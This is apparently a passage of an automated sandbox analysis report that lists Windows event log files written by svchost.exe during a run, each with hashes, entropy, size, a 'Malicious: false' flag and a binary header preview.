Preview:	ElfChnk......................................i...l..F.H.......................................................................YI.......................................R...=...........................................................................................................................f...............?...........................m...................M...F....................3.......................:..........&.......................}............................\...................7..................*..............4...k.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.846087905182893
Encrypted:	false
SSDEEP:	96:3q6VbDRYV8lmVnsHZV85BVXyVctVStVd+VPzVb:zV6V8cVyV8rVCVWVsV0VLVb
MD5:	ABDC860B22BD1F125E9C95F712EBF79C
SHA1:	2BF2F5A7265CAAB282F34F91B8A883525C6AC96F
SHA-256:	A2D707F2AF56912899BA9FB3A9BD863C789AC603D85C7C0BE143AFD259B4DAA7
SHA-512:	02A147C4882927F932BD0BC85322143A51EEDB7F02DC36646168D6BFD7EF447D0DCCD6BD5C892DC5AC7255B8CA3E97332331893A95823F570EBC4D2D0AF47926
Malicious:	false
Preview:	ElfChnk.........F...............F...............p...T2......................................................................v..E........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&....................................................)...............................&............?...........l.........V...&...............................................................@.......X..._.!.....E..........@....l......Pl...e..Pl.......T...?....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....t.-.W..........@...........l.........V.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67008
Entropy (8bit):	4.216758591736857
Encrypted:	false
SSDEEP:	384:Wm6JmBh8mAmehm5+mdkkmpTiMmwmGmemwmbmKmKmOYmcpm9mmm2mjmTrmlmhmYEg:+6pkLTi6euYDxJWHrO+P0zyWD
MD5:	98A55F00D6A65615787318E39157EA99
SHA1:	F329614C95A2EF8DA5DE3652DF9B6EEBEFDC0734
SHA-256:	CDC21397A5EAA5C3C934F4509F937A2B2773FB994BB0F9290CC502AA97207CBD
SHA-512:	07EEEC0E84638A6E1C28ACBACD2F4AF7CFC1A0DA8BA2CCF58AECE4373C4D05CB882E04A7C64FF8F838EDE901E12EA23DA188FAC68B5E95A0343E4719ACCD7777
Malicious:	false
Preview:	ElfChnk.1/......`/......1/......`/..........8........Lz....................................................................._.(.................X...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,..............&............7..................#..............1...[#..s1..c:...................v................_/........l.........V...&...............................................................N.......d..._.!.....[..........@..l......Pl.....Pl...\......._/...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......A.p..........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
Category:	dropped
Size (bytes):	71200
Entropy (8bit):	0.8712502427337568
Encrypted:	false
SSDEEP:	192:PqV7pp8nMLgv5p8nLp8nRv4p8n+V7pp8nMLgv5p8nLp8nRv4p8n:PqhpiMLgRiLiRAi+hpiMLgRiLiRAi
MD5:	AAC92D640266FD21C1370FE9E76C2431
SHA1:	F984EC1F1C16A677B0950696704470E5657A5B25
SHA-256:	D5E8367EBC91B3E87C962C324D706222ADBDC35C905AF21D8681268EF56F66AD
SHA-512:	0D03AD359E9C9CDC2E8270C30FA96B2488089078C2B14055D3CFA904313541917EB70841BC813D1BD05BAFA6E77D4C3691B2393C9086792E2820133B38916612
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk.....................................H.......x./Z.......................................................................<............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................n...............................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.553119382038729
Encrypted:	false
SSDEEP:	768:hPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9xFkogaKw:NXY5nVYIyyqED5BVZUeZ4uvhtxZNHC0
MD5:	FE618E338D5C3D28727C2E34CB67B348
SHA1:	871AC1687017A92308C10AC0D665EE0C5E86330B
SHA-256:	F6F1590ADFBC5766E12DEEEC49C79C61D6E925A006C143F8199DA25E9C228021
SHA-512:	DB38A293F9A82002C8B531E4581AD9685D6805D8C52C52BB070C37741800279B7D8D44886A568D162864F9DA45EA8F5F0CFE6115C891659BDDE5858D7981FE2D
Malicious:	false
Preview:	ElfChnk.........\|...............\|...................r.......................................................................g...................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................................................F...&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	94312
Entropy (8bit):	2.194134683121392
Encrypted:	false
SSDEEP:	384:BoOKlo1hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorGorZlowGoror6:VDCeJLiDCeJLfA
MD5:	0B63F828AEAB4BFEB28F3CA09755C482
SHA1:	5ADC3F369D895B1C7E0DA0E9291B74E1517EB4B1
SHA-256:	EA7C0AD7DB7B58F79555C19EA3FDC0B7A0D49B9C5E2A7D6ACFF780FB69D5518A
SHA-512:	96D4D632A8AE7B837A3742E76A60A2BFA39012D093A37711B8C93B1A685030DD98E18FDA01081A00CFA39AC48309E4CC5839F482B06EF89284F6D2A74FCF59EF
Malicious:	false
Preview:	ElfChnk......................................-.../..^P.......................................................................R..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F........................................................"..........................................................U+..............................**................1."R........V...."..............................................................>.......V...X.!..e................1."R.....Pl.....Pl................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U+......!>....[.U.....i...........\|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 10794-0, spot sensor temperature 0.000000, unit celsius, color scheme 17, calibration: offset 0.000488, slope 671170320874568247259693056.000000
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8969278747465751
Encrypted:	false
SSDEEP:	384:UhAiPA5PNPxPEPHPhPEPmPSPRP3PoPHPc1Px6PEPiP:U2NJn
MD5:	216EB14C32C7E1C183C3849992A80F5A
SHA1:	40A9C4399982EA1E7325194FB23694A17BCC4021
SHA-256:	CE21938B348E147663DB6A985A8007DBA3205D755ADE30C97D5EF2C1C1BC395D
SHA-512:	9CCEB4BCECDF95FBCC39CA6C79477ADE937BA8E990839A39381FF45C1837C59C2A5C0AEE9748FF464EEE0B3EEDD33A28BC183D7B28B1446E09616C7C32CF9890
Malicious:	false
Preview:	ElfChnk......................................'...(..........................................................................1l}................N...........................=...........................................................................................................................f...............?...........................m...................M...F........................................................"..................................................................'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8892351173604517
Encrypted:	false
SSDEEP:	384:ihZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lz:iWXSYieD+tvgzmMvbJfO5p/
MD5:	DB3605F9285639F33537440BE6EDFF19
SHA1:	81FCFAF61C34223E458C3FA15D81CCDB526FA7E3
SHA-256:	01EE95A72E38B2CD87C963328EF980D6CA8F213EB917FE85D0A8B7516AE6DB7A
SHA-512:	E6CCA79CA504AB1F45129BF0800AF3016C95AD1DC4C40820DEC5BCAFDCFF6D2F775C5686B8C3DC68089BBFAFA7272F83656A9FE60B47AE500164234E27DD01CF
Malicious:	false
Preview:	ElfChnk......................................&...(.........................................................................d.e................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&............................!..........................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	105696
Entropy (8bit):	3.7902678160025047
Encrypted:	false
SSDEEP:	384:m2KhXhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRk:m1bCyhLfILxCrT7AbCyhLfILxCrT77
MD5:	B934C23E0E3ABCF3265A91C1D4F96D5C
SHA1:	8082D84A328310850E44A5B70D0F2D3860139EFA
SHA-256:	A36CA34C1B815B23AA5F9BF8CA449AD33629438C22458DB8C965687A404F77E0
SHA-512:	E4C28C28E9F0936B026880177456E7AFDEBDB08B377E45BBAB65942BBD51CA221E374E715C27ABE43CBEBBBF1AF31DC0AE91646A6F25DD8D8B297D6A241245D3
Malicious:	false
Preview:	ElfChnk.........K...............K............................................................................................-.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F............................n...........................}..n.......................................................................................**......K.......e..."R........V....}..............................................................<.......T.....!.................e..."R.....Pl...m..Pl...........K....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`...Nw....F....._.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	114160
Entropy (8bit):	3.7926865225717106
Encrypted:	false
SSDEEP:	768:LcMhFBuyKskZljdoKXjtT/r18rQXn81E+ABUyxFlt6cMhFBuyKskZljdoKXjtT/M:oMhFBuVdMhFBuVY
MD5:	D9D6D3BFBF746F920DF98A2A3831AF06
SHA1:	2CD2E8D352C3F076CC5B178DA8954F3609EFA840
SHA-256:	EEA11F0583342D188598B59A54059CB635EC91100CA5E46663D86E6209ED8605
SHA-512:	1C3A936DED5C0F776E662829FF2DFEC9808253978998D88B8A712C0276EEBE11F70633D6D17402C90CD8427DC3F00DC4A3F3E39F76D3DFA82081885F874D51E5
Malicious:	false
Preview:	ElfChnk.........N...............N.....................o....................................................................._.8................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F..........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.893042009855257
Encrypted:	false
SSDEEP:	768:fLHmQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZayvVjOXJ7MomI:FH
MD5:	CA1A392830DC3B6BB7A7177F4064BCEC
SHA1:	E70797F4EE08C32A74835AF4000A37132F94CF8C
SHA-256:	6B1490490C3235CF3994183473B86A51351219EBED3F0ACBC79472821142440D
SHA-512:	ADB326E0B6E4D104D2F78C2F609B690096B0A96483DBEED5D0B1462AF87FC301C2EC23D9CF5D1BB863D532437EFC81E0EAE5250821EBD138A622DF903C74AB69
Malicious:	false
Preview:	ElfChnk.u.......w.......u.......w...........H...X...HP.......................................................................'1.......................................R...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................*..8...u..........l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 26, DIRTY
Category:	dropped
Size (bytes):	93064
Entropy (8bit):	2.7531686606889156
Encrypted:	false
SSDEEP:	768:dDMAP1Qa5AgfQQnFNs07DMAP1Qa5AgfQQnFNs0:dFP1X5Agflc0FP1X5Agflc
MD5:	2CAE32140023BE192C5F01D8BA4F704F
SHA1:	4553FB486B675DB018FB0D473690EF6351957281
SHA-256:	9F3A4F539ECEDE8D30CD3D468AAD7494E75088D9997552CFF2D2C854B7DE766D
SHA-512:	DB9DF21CB425D3E99C8C783094B748B9BA4866C0E59BDE9F9CDED2E69745D2100C6EE552576A57662F80605D25CC3E0F7243ADDAD25214797CC8DFDD81F7D08A
Malicious:	false
Preview:	ElfFile......................................................................................................................jx.ElfChnk......................................h...k..l..e....................................................................w...................b...........................=...........................................................................................................................f...............?...........................m...................M...F............................R...........................[..&........................................&..............;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4396814509242954
Encrypted:	false
SSDEEP:	384:UhHE8EWE83ETsEiEsELEDEZPWEkTbEtE0EZNjExEAuw9E3E8x7EsE3E7TsEqETEJ:U7MDP0NzJAWC9NH4MM92mK
MD5:	6DFF4B5C09E627EF26FCBBD2DE75C43F
SHA1:	5F4387D1D94268078D7BA6404C86F5B2D8DFFD5C
SHA-256:	A2B945C20718767345C44531C294AC30813401944CB2E975ABA3DDB553F7A1C3
SHA-512:	D26C941A28AC836705CB600E801A7886917DEB7E99B05CCE9C6EFABEEB5BB97385FB7404D9FE3CBF2172D50635E20AC5C66B830EC766A7896B0F90F1B91D9DEB
Malicious:	false
Preview:	ElfChnk.o...............o....................\..x]...2EG.......................................................................................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................5'..5...........&...m<............../...,.......)...2..........u................................?... ......*......o..........Kl.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.362503717077114
Encrypted:	false
SSDEEP:	384:vhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlS:v1T4hc2qi
MD5:	4C92D93C7F87E4A64DC29463091A42C8
SHA1:	D19094A30349985FE09C232BBCC4B878BD6D6AD0
SHA-256:	DA8BE077BEF47E81B3E12759DEA5420155BA265493A46658EA13F2F928F72D90
SHA-512:	C3A683682B62C8DBA808AB677C2E84AE21DB5BEB3CAA18392EC76FDD5C69D62801C6AEA74AE28356D06F93164FD5E03784025CA2ED3B7107F62F216531F2C859
Malicious:	false
Preview:	ElfChnk.........m...............m...........@......Q%<Z....................................................................@y./................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F............................\|..........................6...&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4849846631124035
Encrypted:	false
SSDEEP:	384:EhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfj:EzSKEqsMuy69zW
MD5:	2226C05A4399EA005069701F13C50CDF
SHA1:	47682BF1A26013DD0AD0CE208EDDA173A3E7DC1F
SHA-256:	50777B2EC76C0C3462FE80F41F429A0DC495AFDE5863B88A5BE933D20FFAA72F
SHA-512:	9E879918D8840263A4B689A7F7EC1E3D56A24A29108745F12075D0DDA58FD382862CE749D25B34863FA8510A847731C7BDD5FD35A1E4D1014C86DFA4E6A43200
Malicious:	false
Preview:	ElfChnk.........L...............L...........x..............................................................................LH.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F............................`...........................h..........=...............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1948803970786184
Encrypted:	false
SSDEEP:	384:2hMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3ze:2mw9g3LSn
MD5:	8A2170B6115170B335F7B2DF888450F5
SHA1:	CC01B3B27D4CD98569849918BEFA4C22DB3422CD
SHA-256:	88EE4C534A63BC86A5438584171B849D35EDAFACB1E97DF6250257EA71A9C194
SHA-512:	73338AC3FB0FB8F4B159CE9D8BEFCE0E4C3622C6BE478D2F8962108DE5EC8F5A176B89359518679AB534573AFBD3D129780A818D6398E51D953DB34DBDF43DA0
Malicious:	false
Preview:	ElfChnk.........6...............6........... q...r...V.........................................................................%................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F............................X......E...................^`..n.......#...............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9290486353315277
Encrypted:	false
SSDEEP:	384:ehSIdreMAiIaMIERIhIVIH3ID4IUIVIFNIBeIaI9IjILIMI+I:egR0a
MD5:	BE1D04E97F63FA592D815B2E30BFF402
SHA1:	BA7066B9A288A05903F98A4D6D4DE078F0C97055
SHA-256:	C69017673291C70B6407E3A6A20A668BB0DEC221BBF7FE28DC536875F6CBB544
SHA-512:	95A39015B0E3837E5F5A22C1941F63C2DEE1DD1BC3F39D09F6AB3AF9CD32EEB50B1B5D5D06DF2D8121EAA4A029CCB56AB78C8E19F07CD0D8E0607B6665810CF4
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........p...06...1......................................................................4.>.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................**..p...K.......]w.Ql.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 388, DIRTY
Category:	dropped
Size (bytes):	103112
Entropy (8bit):	5.686700124256509
Encrypted:	false
SSDEEP:	768:2BBMO5HekFNcZlinm51nXVjbHR+3g+p+Y+5K/+td+Xo+OS:gBh5+blinmTnXVjbHRRglgK/8dmoLS
MD5:	58459065089D3AA09490162C35CB3FB2
SHA1:	BE16539A16A8650F90FA5D917A180BDC0069A836
SHA-256:	2A686A28C2B8038A87AF958686C001F5E9D63D8433E297B1A46E1A1726839B41
SHA-512:	D4B022202E10EEEA44F984AEB6B520C1434C3DBB48453EF88AE537B84BC5F6DCE4BC732AE3E34952E27AE141B2D0A56A1226867E17A19055420FE49E26C860A3
Malicious:	false
Preview:	ElfFile.....................................................................................................................Q..ElfChnk.z...............z............................/......................................................................w#..........................................6...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......Q...................."..........................................)H..............................................**......z.......'...j.........R#,.&.......R#,...t\....iR(.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0410598219769145
Encrypted:	false
SSDEEP:	384:Bh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMDGMbqeMmaZM3:BeJI/
MD5:	2A6CB378303A1D981C7B0A302BEE8BD1
SHA1:	B4907ECBB48F54714B8AC0258234E8D82E76D84E
SHA-256:	A7DAFB2EE13C6310BAD470E94B69B7A684455C719CBFDDF4E5C30C980FF7C2F8
SHA-512:	30F7B30A66B94F9C1CB5E84F0CE3357507EE9D487A150B58E201A8221C18DAC1FC2E90C6D7D158EE398045DD43204CCDB7600C7E21AE25AABB55789D5C93DE29
Malicious:	false
Preview:	ElfChnk......................................-..0/...i.?.....................................................................V_N........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................%...........................(..........................................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.243738767955284
Encrypted:	false
SSDEEP:	384:Yhk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:YBjdjP0cs3ZMgC
MD5:	2A5848FF3CA56A36A448877BFDD56309
SHA1:	BB2591B44C6643F6F728BEA3FBC86AEA08A5AE9C
SHA-256:	DCDC586F358A6D8C852C98BB1FC4A389B6687F9C7274F6B2C6EBE2390F0EF70A
